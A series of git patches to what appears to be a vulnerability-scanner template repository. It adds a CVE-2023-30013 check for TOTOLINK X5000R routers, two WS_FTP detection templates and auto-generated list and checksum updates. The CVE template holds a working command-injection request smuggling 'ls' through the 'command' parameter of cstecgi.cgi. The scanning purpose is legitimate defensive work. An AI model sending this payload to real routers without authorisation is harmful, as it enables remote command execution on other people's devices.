TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Signed-off-by: GwanYeong Kim 
---
 http/cves/2023/CVE-2023-30013.yaml | 45 ++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-30013.yaml

diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml
new file mode 100644
index 0000000000..bfe887c133
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30013.yaml
@@ -0,0 +1,45 @@
+id: CVE-2023-30013
+
+info:
+  name: TOTOLink - Unauthenticated Command Injection
+  author: gy741
+  severity: critical
+  description: |
+    TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30013
+    - https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-30013
+    cwe-id: CWE-78
+    epss-score: 0.102540000
+    epss-percentile: 0.942680000
+    cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:*
+  tags: totolink,cve,cve2023,router,unauth,rce,iot
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/cstecgi.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        {"command":"127.0.0.1; ls>../{{randstr}};#","num":"230","topicurl":"setTracerouteCfg"}
+
+      - |
+        GET /{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ".sh"
+          - ".cgi"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From f953aca2879df362c8f0ec25b592033615d00232 Mon Sep 17 00:00:00 2001
From: johnk3r 
Date: Sat, 30 Sep 2023 05:21:24 -0300
Subject: [PATCH 0622/1090] Create wsftp-detect.yaml (#8285)

* Create wsftp-detect.yaml

* Update and rename wsftp-detect.yaml to wsftp-ssh-detect.yaml

* Update and rename wsftp-ssh-detect.yaml to ws_ftp-ssh-detect.yaml

* Create ws_ftp-server-web-transfer.yaml

* misc update

* Update ws_ftp-server-web-transfer.yaml

* Update ws_ftp-ssh-detect.yaml

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
---
 .../ws_ftp-server-web-transfer.yaml           | 38 +++++++++++++++++++
 network/detection/ws_ftp-ssh-detect.yaml      | 34 +++++++++++++++++
 2 files changed, 72 insertions(+)
 create mode 100644 http/exposed-panels/ws_ftp-server-web-transfer.yaml
 create mode 100644 network/detection/ws_ftp-ssh-detect.yaml

diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
new file mode 100644
index 0000000000..d4bd5e7f02
--- /dev/null
+++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
@@ -0,0 +1,38 @@
+id: ws_ftp-server-web-transfer
+
+info:
+  name: WS_FTP Server Web Transfer - Panel Detect
+  author: johnk3r
+  severity: info
+  description: WS_FTP Server Web Transfer panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  metadata:
+    max-request: 1
+    verified: true
+    vendor: progress
+    product: ws_ftp
+    shodan-query: http.title:"WS_FTP Server Web Transfer"
+  tags: panel,ws_ftp
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 3
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'WS_FTP Server Web Transfer Client'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/network/detection/ws_ftp-ssh-detect.yaml b/network/detection/ws_ftp-ssh-detect.yaml
new file mode 100644
index 0000000000..91a69ce616
--- /dev/null
+++ b/network/detection/ws_ftp-ssh-detect.yaml
@@ -0,0 +1,34 @@
+id: ws_ftp-ssh-detect
+
+info:
+  name: WS_FTP-SSH Service - Detect
+  author: johnk3r
+  severity: info
+  description: |
+    WS_FTP-SSH service was detected.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: progress
+    product: ws_ftp
+    shodan-query: "WS_FTP port:22"
+  tags: network,ssh,ws_ftp
+
+tcp:
+  - host:
+      - "{{Hostname}}"
+    port: 22
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)WS_FTP-SSH'
+
+    extractors:
+      - type: regex
+        regex:
+          - '(?i)SSH-(.*)-WS_FTP-SSH[^\r]+'

From 9bd699918bfa61b514c9d6f72f2ff599d052bfd5 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 30 Sep 2023 08:21:45 +0000
Subject: [PATCH 0623/1090] Auto Generated New Template Addition List [Sat Sep
 30 08:21:44 UTC 2023] :robot:

---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.new-additions b/.new-additions
index 6e508125f5..83ce27cb8d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-42793.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/cves/2023/CVE-2023-5074.yaml
+http/exposed-panels/ws_ftp-server-web-transfer.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
@@ -23,3 +24,4 @@ http/misconfiguration/installer/zabbix-installer.yaml
 http/misconfiguration/installer/zencart-installer.yaml
 http/technologies/blazor-webassembly-detect.yaml
 network/detection/bgp-detect.yaml
+network/detection/ws_ftp-ssh-detect.yaml

From 7d1f58d8af3a91316bc215574dfbb87f62a14859 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 30 Sep 2023 08:21:54 +0000
Subject: [PATCH 0624/1090] Auto Generated Templates Checksum [Sat Sep 30
 08:21:54 UTC 2023] :robot:

---
 templates-checksum.txt | 410 +++++++++++++++++++++--------------------
 1 file changed, 206 insertions(+), 204 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 72f5ff368c..919cf3a18d 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:1a4037113f94ee8e1cfb1742f740a47cdac1dba1
-cves.json-checksum.txt:642c9c202bb2c91b52034550efd88b052bbe9a2a
+cves.json:d1b620a4ffdff4357f8ac0f6c2851432b383d21d
+cves.json-checksum.txt:01b01701e0b0067c448bd00ab0c5b57c4e3d3e0a
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -471,7 +471,7 @@ helpers/wordpress/plugins/megamenu.txt:157d4751f6fc258dd2244da6c46a957ae64e4258
 helpers/wordpress/plugins/members.txt:e533118608a55d6ab1d3699c600fc5c59213df36
 helpers/wordpress/plugins/meta-box.txt:17358dc21f97cd982510de77bcdadcaf77ef5371
 helpers/wordpress/plugins/ml-slider.txt:7176936bad0d4f9d606c9f066f2e6d22aea121f7
-helpers/wordpress/plugins/newsletter.txt:8179f6751c646b7c3f539243147306a43ca806f3
+helpers/wordpress/plugins/newsletter.txt:8036ff38281f34fe7346b080442e440526335126
 helpers/wordpress/plugins/nextend-facebook-connect.txt:4be1dfbb67ef8087f7232dac0ed90c2603a22047
 helpers/wordpress/plugins/nextgen-gallery.txt:9ba3ba859fda4b27ead81d8ddbeb1cd132e92901
 helpers/wordpress/plugins/ninja-forms.txt:802d91a07f27206424765f38e0bb5c75968ae33a
@@ -3720,6 +3720,7 @@ http/exposed-panels/wordpress-login.yaml:48cee6ec2733086c95bf9fdd46469f43cbe38ee
 http/exposed-panels/workresources-rdp.yaml:1e7b26e95298777a13d8b6a05c27e8571c3a953b
 http/exposed-panels/workspace-one-uem.yaml:052c6675f094f95cc30aaca8ada549e2425ebf86
 http/exposed-panels/wowza-streaming-engine.yaml:e956aec0e3865a780df4d3060a56873d230267fa
+http/exposed-panels/ws_ftp-server-web-transfer.yaml:528498596b005546530b1e71c669c1dd014cf95d
 http/exposed-panels/wso2-management-console.yaml:aed80639527071b4d80f236720eb2b415a7301a9
 http/exposed-panels/xds-amr-status.yaml:73248791595d3a90634169c59a057ff80d0aba72
 http/exposed-panels/xeams-admin-console.yaml:8a2dff2e6626031ab304277ca415a8ee3834b1e8
@@ -5869,218 +5870,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:924927777d59fef8a11d68dda86b4a14086ddfbd
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
